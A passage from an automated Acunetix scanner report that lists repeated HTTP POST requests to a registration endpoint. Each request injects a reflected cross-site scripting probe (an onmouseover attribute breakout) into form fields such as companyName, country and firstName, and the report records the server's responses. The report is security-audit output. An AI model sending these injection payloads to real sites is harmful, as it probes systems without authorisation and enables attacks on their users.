<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:164px">
<td colspan="19" class="s43">Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=%22%20onmouseover%3dprompt%28956217%29%20bad%3d%22&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:49 GMT<br>Content-Length: 14686</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input companyName was set to &quot; onmouseover=prompt(948417) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=%22%20onmouseover%3dprompt%28948417%29%20bad%3d%22&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:52 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input companyName was set to &quot; onmouseover=prompt(945673) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:160px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br></td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">15</td>
</tr>
</table>
<a name="PageN16"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:75px">
<td colspan="19" class="s43">address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=%22%20onmouseover%3dprompt%28945673%29%20bad%3d%22&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevq</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input companyName was set to &quot; onmouseover=prompt(921405) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=%22%20onmouseover%3dprompt%28921405%29%20bad%3d%22&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=mjskcysw&amp;lastName=mjskcysw&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:98px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:52 GMT<br>Connection: close<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input companyName was set to &quot; onmouseover=prompt(933212) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=%22%20onmouseover%3dprompt%28933212%29%20bad%3d%22&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=mjskcysw&amp;lastName=mjskcysw&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:3px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">16</td>
</tr>
</table>
<a name="PageN17"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:51 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input companyName was set to &quot; onmouseover=prompt(901678) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=%22%20onmouseover%3dprompt%28901678%29%20bad%3d%22&amp;country=USA&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=mjskcysw&amp;lastName=mjskcysw&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:51 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to &quot; onmouseover=prompt(961809) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 395<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=%22%20onmouseover%3dprompt%28961809%29%20bad%3d%22&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=tktbotms&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:74px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">17</td>
</tr>
</table>
<a name="PageN18"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:16px">
<td colspan="19" class="s43" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to &quot; onmouseover=prompt(964257) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 395<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=%22%20onmouseover%3dprompt%28964257%29%20bad%3d%22&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=lajitjth&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:54 GMT<br>Content-Length: 14696</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to &quot; onmouseover=prompt(954012) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 381<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=%22%20onmouseover%3dprompt%28954012%29%20bad%3d%22&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wpchbgkt&amp;lastName=wpchbgkt&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT<br>Content-Length: 14696</td>
</tr>
<tr style="height:77px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">18</td>
</tr>
</table>
<a name="PageN19"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to &quot; onmouseover=prompt(986795) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 381<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=%22%20onmouseover%3dprompt%28986795%29%20bad%3d%22&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wpchbgkt&amp;lastName=wpchbgkt&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT<br>Content-Length: 14696</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input country was set to &quot; onmouseover=prompt(912296) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 381<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=%22%20onmouseover%3dprompt%28912296%29%20bad%3d%22&amp;creditCardExpirationMonth=02&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=wpchbgkt&amp;lastName=wpchbgkt&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:53 GMT<br>Content-Length: 14696</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input firstName was set to &quot; onmouseover=prompt(926052) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">19</td>
</tr>
</table>
<a name="PageN20"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=%22%20onmouseover%3dprompt%28926052%29%20bad%3d%22&amp;lastName=ldvmiyic&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:58 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input firstName was set to &quot; onmouseover=prompt(925311) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:231px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 390<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137%20Laguna%20Street&amp;address2=3137%20Laguna%20Street&amp;answer=&amp;city=San%20Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137%20Laguna%20Street&amp;firstName=%22%20onmouseover%3dprompt%28925311%29%20bad%3d%22&amp;lastName=vdqevqkq&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:59 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input firstName was set to &quot; onmouseover=prompt(957771) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:74px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">20</td>
</tr>
</table>
<a name="PageN21"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:179px">
<td colspan="19" class="s43">Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br> <br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=03&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=%22%20onmouseover%3dprompt%28957771%29%20bad%3d%22&amp;lastName=jcyvqrug&amp;p</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:58 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input firstName was set to &quot; onmouseover=prompt(915645) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Request</td>
</tr>
<tr style="height:247px">
<td colspan="19" class="s43">POST /yuliana/registration/processUser HTTP/1.1<br>Content-Length: 376<br>Content-Type: application/x-www-form-urlencoded<br>Cookie: JSESSIONID=78B8DAEAE2322298FD8B117E90C55793<br>Host: 134.154.14.153:8080<br>Connection: Keep-alive<br>Accept-Encoding: gzip,deflate<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)<br>Accept: */*<br><br>address1=3137 Laguna Street&amp;address2=3137 Laguna Street&amp;answer=&amp;city=San Francisco&amp;companyName=Acunetix&amp;country=USA&amp;creditCardExpirationMonth=01&amp;creditCardExpirationYear=2012&amp;creditCardNumber=4111111111111111&amp;creditCardType=Visa&amp;emailAddress=3137 Laguna Street&amp;firstName=%22%20onmouseover%3dprompt%28915645%29%20bad%3d%22&amp;lastName=jcyvqrug&amp;password=acUn3t1x&amp;state=NY&amp;zip=94102</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Response</td>
</tr>
<tr style="height:83px">
<td colspan="19" class="s43">HTTP/1.1 200 OK<br>Server: Apache-Coyote/1.1<br>Content-Type: text/html<br>Date: Sun, 26 Feb 2012 03:14:58 GMT<br>Content-Length: 14691</td>
</tr>
<tr style="height:22px">
<td colspan="19" class="s42">/yuliana/registration/processUser</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s41">Details</td>
</tr>
<tr style="height:51px">
<td colspan="19" class="s13">URL encoded POST input firstName was set to &quot; onmouseover=prompt(973612) bad=&quot; <br>The input is reflected inside a tag element between double quotes.</td>
</tr>
